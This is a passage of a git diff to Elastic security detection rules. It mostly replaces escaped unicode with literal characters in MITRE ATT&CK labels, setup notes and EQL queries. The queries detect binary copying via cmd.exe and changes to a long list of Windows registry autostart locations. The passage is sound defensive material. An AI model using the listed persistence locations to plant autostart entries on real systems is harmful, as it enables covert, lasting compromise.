@@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json index e7fc8be012d..d2803d63d93 100644 --- a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_1.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json index 665e2c2ce09..659668c273c 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_104.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json index b6c0ba99b64..7d955dec2bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_105.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json index 22fbff78c67..43225c989a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json index 7026a767708..9c1677cb782 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_107.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json index b7a148b4a05..8d8b788786d 100644 --- a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_108.json 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json
index 103c27836d9..881d5bf49a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_1.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Binary Content Copy via Cmd.exe",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\"\u003e\", \"\u003e\u003e\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\">\", \">>\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json
index 77116bd7278..e521453d015 100644
--- a/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/53dedd83-1be7-430f-8026-363256395c8b_2.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Binary Content Copy via Cmd.exe",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\"\u003e\", \"\u003e\u003e\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and (\n (process.args : \"type\" and process.args : (\">\", \">>\")) or\n (process.args : \"copy\" and process.args : \"/b\"))\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json
index 09a1121f777..022c227dd30 100644
--- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_102.json
@@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n 
\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal 
Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n 
\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json index 47ceec757f9..6f82aaf10fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_103.json 
@@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n 
